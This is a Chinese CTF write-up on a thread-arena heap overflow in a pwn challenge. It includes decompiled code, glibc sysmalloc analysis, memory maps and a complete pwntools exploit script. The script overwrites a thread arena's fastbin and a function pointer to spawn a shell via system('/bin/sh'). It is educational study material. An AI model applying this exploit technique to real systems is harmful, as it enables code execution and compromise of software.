0x00 背景
这道题当时并没有做出来, 不过上周末社团内部分享了一下, 于是之后自己也复现了一下, 花了不少时间, 也学到了不少知识. 写一篇文章记录一下.
0x01 程序分析
main 函数:
__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
pthread_t newthread; // [rsp+28h] [rbp-118h]
char s; // [rsp+30h] [rbp-110h]
unsigned __int64 canary; // [rsp+138h] [rbp-8h]
canary = __readfsqword(0x28u);
setvbuf(stdin, 0LL, 2, 0LL);
setvbuf(stdout, 0LL, 2, 0LL);
memset(&s, 0, 0x100uLL);
puts("Enter secret password: ");
if ( fgets(&s, 256, stdin) == 0LL )
exit(1);
sleep(3u);
if ( strcmp(&s, "i'm ready for challenge\n") )
{
puts("Access denied");
exit(1);
}
if ( pthread_create(&newthread, 0LL, (void *(*)(void *))start_routine, 0LL) < 0 ) //调用线程
{
puts("Internal error, contact admin.");
exit(1);
}
pthread_join(newthread, 0LL);
return 0LL;
}
start_routine:
__int64 __fastcall start_routine(void *a1)
{
int i; // [rsp+14h] [rbp-1Ch]
int choice; // [rsp+18h] [rbp-18h]
int size; // [rsp+1Ch] [rbp-14h]
int padblock_count; // [rsp+20h] [rbp-10h]
void *padblock_ptr; // [rsp+28h] [rbp-8h]
write(1, "***************************************\n", 0x28uLL);
write(1, "* Welcome to Nu1L's /dev/null service *\n", 0x28uLL);
write(1, "***************************************\n", 0x28uLL);
write(1, "1. use /dev/null service\n", 0x19uLL);
write(1, "2. exit\n", 8uLL);
g_func_ptr = (__int64 (__fastcall *)(_QWORD, _QWORD))write_sth;
while ( 1 )
{
while ( 1 )
{
write(1, "Action: ", 8uLL);
choice = get_input_num();
if ( choice != 1 )
break;
write(1, "Size: ", 6uLL);
size = get_input_num();
if ( size >= 0 && size <= 0x4000 )
{
write(1, "Pad blocks: ", 0xCuLL);
padblock_count = get_input_num();
if ( padblock_count >= 0 && padblock_count <= 1000 )
{
for ( i = 0; i < padblock_count; ++i )
malloc(size);
padblock_ptr = malloc(size);
write(1, "Content? (0/1): ", 0x10uLL);
if ( get_input_num() )
{
write(1, "Input: ", 7uLL);
get_input((__int64)padblock_ptr, size); //这个函数里面存在溢出
g_func_ptr(padblock_ptr, size);
}
}
else
{
write(1, "Invalid padblock count.\n", 0x18uLL);
}
}
else
{
write(1, "Invalid size.\n", 0xEuLL);
}
}
if ( choice == 2 )
break;
if ( choice == 1337 )
system("/usr/bin/id"); //已经有system函数了
else
write(1, "Invalid command.\n", 0x11uLL);
}
return fgetxattr(0);
}
get_input:
size_t __fastcall get_input(__int64 padblock_ptr, size_t size)
{
size_t result; // rax
int v3; // [rsp+1Ch] [rbp-14h]
size_t i; // [rsp+20h] [rbp-10h]
for ( i = 0LL; ; i += v3 )
{
result = i;
if ( i >= size )
break;
v3 = read(0, (void *)(padblock_ptr + i), size);
if ( v3 <= 0 )
{
write(1, "I/O error\n", 0xAuLL);
fgetxattr(1u);
}
}
return result;
}
这个函数里面存在明显的溢出. 比如size = 100
, 那么我第一次输入90个字符, 第二次还可以输入100个字符.
综上, 这道题是一道堆溢出的题目. 而漏洞则是和线程有关
0x02 漏洞分析
经过debug我们可以知道线程的堆是通过mmap映射到紧邻libc低地址处的. 而且线程的堆的初始大小为132kb, 当这些堆块耗尽时ptmalloc会首先考虑向高地址处扩展
堆块的大小, 但是如果扩展失败(比如高地址处已经有libc在使用了)就会重新用mmap新映射一个堆块, 而新映射的堆块的地址就在原来堆块的低地址处!(具体参考文末的
glibc malloc分析)所以我们的思路就是首先耗尽可扩展的堆块空间, 然后利用新的堆块在低地址, 我们可以利用程序存在的溢出将 thread arena 的某个fast bin 覆盖为 bss中的值,
从而在bss段分配一个fake chunk进而修改start_routine 中的g_func_ptr为system 的plt表地址, 从而达到调用system("/bin/sh") getshell 的目的
利用过程
1. 确定需要先malloc多少空间
这儿遇见的一个坑(参考文末), 我是根据一次次debug测试出来究竟需要首先malloc多大的空间, 思路非常无脑--不断地调用malloc, 同时使用 gdb 的vmmap观察
内存分布情况, 直到逼近正确的大小.
2. fast bin attack
我选择了 覆盖 fast_bin, 于是首先得找到一个符合条件的地址. ptmalloc 对 chunk 的size会检查的.
ptmalloc 首先会根据申请的 size计算index:
/* offset 2 to use otherwise unindexable first 2 bins */
#define fastbin_index(sz) \
((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2)
然后根据得到的index从对应的fastbin中取出一个chunk的指针, 然后还会计算这个chunk的size是否正确:
/* Get size, ignoring use bits */
#define chunksize(p) (chunksize_nomask (p) & ~(SIZE_BITS))
//...
if (__builtin_expect (fastbin_index (chunksize (victim)) != idx, 0))
{
errstr = "malloc(): memory corruption (fast)";
errout:
malloc_printerr (check_action, errstr, chunk2mem (victim), av);
return NULL;
}
我是在0x60201d
处找到合适的size的:
于是我就把fast_bin 覆盖为0x60201d
, 然后再malloc就可以得到一个从0x60202d
开始的chunk了, 大小为0x60. 于是我们就可以写入"/bin/sh"并覆盖
g_func_ptr, 然后调用g_func_ptr(padblock_ptr, size);
就可以拿到shell啦~
exp:
#/usr/env/bin python
#-*- coding: utf-8 -*-
from pwn import *
import sys
wait = 0.3
def use(Size,Num,flag):
io.recvuntil('Action: ')
io.sendline(str(1))
io.recvuntil('Size: ')
io.sendline(str(Size))
io.recvuntil('Pad blocks: ')
io.sendline(str(Num))
io.recvuntil('(0/1): ')
if flag==0:
io.sendline(str(0))
else:
io.sendline(str(1))
io.recvuntil('Input: ')
def quit():
io.recvuntil('Action: ')
io.sendline(str(2))
context.binary = "./null"
elf = ELF('./null')
io = process('./null')
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
psd = "i'm ready for challenge\n"
io.recvuntil('Enter secret password: \n')
io.send(psd)
for i in range(0, 12):
use(0x4000, 1000, 0)
use(0x4000, 261, 0)
use(0x3000, 0, 0)
use(0xfe0, 0, 1)
io.sendline('a' * 0xfd0 + '\x00')
sleep(0.3)
io.sendline('b' * (0x80-34) + p64(0x300000000) + 10*p64(0x60201d) + '\x00')
system_plt = 0x0000000000400978
use(0x60, 0, 1)
sleep(wait)
io.sendline(("/bin/sh\x00".ljust(11) + p64(system_plt) + 'b'*16).ljust(0x60))
io.interactive()
# gdb.attach(io)
# 0x000000000060201d
# 0x0000000000602038
收获:
学到了新的操作的同时也顺便复习了一波fast bin attack. 大概看了一遍malloc源码. 熟悉的pwndbg的使用. 有些情况下确实比 ida 要方便不少.
收获很多. 需要学的也很多. 继续加油吧
附:
1. 遇见的坑
1.1 偏移问题
wp中提到的方法是malloc大量的空间使得thread的heap因为libc的阻挡没有办法继续向高地址处增长, 进而从低地址处重新map一块空间进而利用堆溢出
漏洞来覆盖malloc_state. 那么究竟需要分配多大的空间呢? 难道每次需要分配的空间都是固定的吗. 于是我试着运行了几次程序, 并计算 thread heap 和
理其最近的libc之间的偏移. 得到几次结果如下:
0x7fb314000020
0x7fb31ac26000,
0x6c25fe0
0x7fc500000020,
0x7fc504f05000
0x4f04fe0
0x7f2d08000020,
0x7f2d0d46b000
第一个是threa_arena的地址, 第二个是libc地址, 第3个是偏移. 我发现每次的偏移都是不固定的.........那么我怎么知道要分配多大的空间呢?
后来经过观察发现其实踩到了一个坑, 虽然偏移不同, 但是中间使用malloc分配的空间确实相同的:
0x7f2d08000000 0x7f2d0bffd000 rw-p 3ffd000 0
0x7f2d0bffd000 0x7f2d0c000000 ---p 3000 0
0x7f2d0cc6a000 0x7f2d0cc6b000 ---p 1000 0
0x7f2d0cc6b000 0x7f2d0d46b000 rw-p 800000 0
0x7f2d0d46b000 0x7f2d0d62b000 r-xp 1c0000 0 /lib/x86_64-linux-gnu/libc-2.23.so
0x7ff810000000 0x7ff813ffd000 rw-p 3ffd000 0
0x7ff813ffd000 0x7ff814000000 ---p 3000 0
0x7ff8170ff000 0x7ff817100000 ---p 1000 0
0x7ff817100000 0x7ff817900000 rw-p 800000 0
0x7ff817900000 0x7ff817ac0000 r-xp 1c0000 0 /lib/x86_64-linux-gnu/libc-2.23.so
0x7f57bc000000 0x7f57bfffd000 rw-p 3ffd000 0
0x7f57bfffd000 0x7f57c0000000 ---p 3000 0
0x7f57c3c5a000 0x7f57c3c5b000 ---p 1000 0
0x7f57c3c5b000 0x7f57c445b000 rw-p 800000 0
0x7f57c445b000 0x7f57c461b000 r-xp 1c0000 0 /lib/x86_64-linux-gnu/libc-2.23.so
0x7f495c000000 0x7f495fffd000 rw-p 3ffd000 0
0x7f495fffd000 0x7f4960000000 ---p 3000 0
0x7f4960640000 0x7f4960641000 ---p 1000 0
0x7f4960641000 0x7f4960e41000 rw-p 800000 0
0x7f4960e41000 0x7f4961001000 r-xp 1c0000 0 /lib/x86_64-linux-gnu/libc-2.23.so
第一行是thread heap 的空间. 以第一个为例: 我实际malloc的空间只是0x3ffd000 + 0x800000, 剩下的0x3000 + 0x1000 应该属于freed chunk(因为malloc(0x4000), 每次运行
这些值都是相等的. 而整体偏移不等的原因是因为有些空间没有显示出来而且大小是随机的. 比如第一个中的0x7f2d0c000000 到 0x7f2d0cc6a000, 我尝试访问这其中的地址会得到
Cannot access memory at address
提示. 不管这些空间是干什么的, 显然现在知道每次malloc所需要知道的空间大小都是确定的了.
1.2 pwntools io.sendline() 问题
pwntools 连续两次使用 send()/sendline() 之间 最好调用一下 sleep()..... 至于时间我一般用0.3s, 其实最好是中间加个 recvuntil(). 否则可能会发生一些莫名其妙的错误,而且找起来也非常麻烦........
1.3 "/bin/sh" 问题
因为我需要在地址前面填充11个字符, 所以我使用了"/bin/sh".ljust(11)
, 然后就getshell失败了.......把改成"/bin/sh\x00".ljust(11)
就好使了..... 因为ljust() 使用'\x20'
(空格)来填充, 而不是 '\x00'
2. glibc malloc分析
首先贴上原文的描述:
The only way to bypass this is if we made mprotect fail. So , if we made our heap segment close to a different memory segment. Normally, its above a non-readable,writable and executable page so that it can easily extend into it. But if we spam alloc to make it above a libc segment, and then overwrite top chunk, we can trigger _int_free.
With this, we can do unsorted bin attack on known addresses (like in bss ), and also in the threads arena (partial overwrites) Unfortunately , that lead nowhere.
If we spam mallocs, then we can make possible a certain case where the mmap segments are continuous with each other, and the segment where we malloc will be right above the thread_arena, hence we will overflow into thread_arena.
个人感觉说的太简单了......反正我是看半天没看懂到底原理是什么, 现在就具体分析一下.
首先看malloc.c中的源码.
首先调用的是__libc_malloc
, 然后在其中调用int_malloc
太长而且和本题关系不大我就不贴了....
在int_malloc
中当ptmalloc检查发现top_chunk已经无法满足需要分配的块的大小的时候就会调用sys_malloc
函数来向系统申请更多的空间:
#malloc.c sysmalloc
if (av != &main_arena)
{
heap_info *old_heap, *heap;
size_t old_heap_size;
/* First try to extend the current heap. */
old_heap = heap_for_ptr (old_top);
old_heap_size = old_heap->size;
if ((long) (MINSIZE + nb - old_size) > 0
&& grow_heap (old_heap, MINSIZE + nb - old_size) == 0)
{
av->system_mem += old_heap->size - old_heap_size;
arena_mem += old_heap->size - old_heap_size;
set_head (old_top, (((char *) old_heap + old_heap->size) - (char *) old_top)
| PREV_INUSE);
}
else if ((heap = new_heap (nb + (MINSIZE + sizeof (*heap)), mp_.top_pad)))
{
/* Use a newly allocated heap. */
heap->ar_ptr = av;
heap->prev = old_heap;
av->system_mem += heap->size;
arena_mem += heap->size;
/* Set up the new top. */
top (av) = chunk_at_offset (heap, sizeof (*heap));
set_head (top (av), (heap->size - sizeof (*heap)) | PREV_INUSE);
/* Setup fencepost and free the old top chunk with a multiple of
MALLOC_ALIGNMENT in size. */
/* The fencepost takes at least MINSIZE bytes, because it might
become the top chunk again later. Note that a footer is set
up, too, although the chunk is marked in use. */
old_size = (old_size - MINSIZE) & ~MALLOC_ALIGN_MASK;
set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ), 0 | PREV_INUSE);
if (old_size >= MINSIZE)
{
set_head (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ) | PREV_INUSE);
set_foot (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ));
set_head (old_top, old_size | PREV_INUSE | NON_MAIN_ARENA);
_int_free (av, old_top, 1);
}
首先是调用grow_heap
看能否向高地址处扩充现有堆的大小, 如果扩容失败的话就会调用new_heap
来新map一块空间作为堆.下面以实例分析.
对于如下代码:
gcc -g -o test test.c -lpthread
/* Per thread arena example. */
#include <stdio.h>
#include <stdlib.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/types.h>
void* threadFunc(void* arg) {
void *ptr;
ptr = malloc(0x10000);
printf("11ptr: %p\n", ptr);
ptr = malloc(0x10000);
printf("12ptr: %p\n", ptr);
ptr = malloc(0x10000);
printf("21ptr: %p\n", ptr);
ptr = malloc(0x10000);
printf("22ptr: %p\n", ptr);
for(int i=0; i<0x3fc; ++i){
malloc(0x10000);
}
ptr = malloc(0x10000);
printf("31ptr: %p\n", ptr);
ptr = malloc(0x10000);
printf("32ptr: %p\n", ptr);
}
int main() {
pthread_t t1;
void* s;
int ret;
ret = pthread_create(&t1, NULL, threadFunc, NULL);
if(ret)
{
printf("Thread creation error\n");
return -1;
}
ret = pthread_join(t1, &s);
if(ret)
{
printf("Thread join error\n");
return -1;
}
return 0;
}
编译后运行查看空间变化情况:
这是第一次malloc后的空间情况, 方框标出的就是malloc的部分.查看地址0x7ffff0000000处发现果然是heapinfo, 而0x7ffff0000020处就是thread_arena 的malloc_state实例
libintl.h heap_info
typedef struct _heap_info
{
mstate ar_ptr; /* Arena for this heap. */
struct _heap_info *prev; /* Previous heap. */
size_t size; /* Current size in bytes. */
size_t mprotect_size; /* Size in bytes that has been mprotected
PROT_READ|PROT_WRITE. */
/* Make sure the following data is properly aligned, particularly
that sizeof (heap_info) + 2 * SIZE_SZ is a multiple of
MALLOC_ALIGNMENT. */
char pad[-6 * SIZE_SZ & MALLOC_ALIGN_MASK];
} heap_info;
继续运行程序:又经过3次malloc之后原来的0x31000的空间被用光了, 于是ptmalloc调用了
grow_heap
来扩容heap:
扩容到了0x41000.
可以看到还剩0x3fbf000的空间, 如果我们把这些空间也都耗尽会发生什么呢?我们继续运行:
这是我们耗尽0x3fbf000的空间后又继续malloc的结果: ptmalloc调用了new_heap
在原来的heap的低地址处又分配了一个新的heap, 我们查看这个块的头部:
果然是heap_info实例, av_ptr指向原来的malloc_state实例, prev 指向原来的heap_info.
于是我们再将剩下的0x3fcf000耗尽就可以利用堆溢出覆盖原来的malloc_state实例了.
我的例子中两个heap之间并不是紧邻的, 而是隔了一块空间(应该是尚未被映射), 所以并不能利用溢出覆盖后面的. 不过好在这道题目中是紧邻的. 至于为什么会有这块空间我也不清楚.....可能和分配的大小有关吧....不过这儿我们关心的是sysmalloc
的逻辑, 这个就不管了.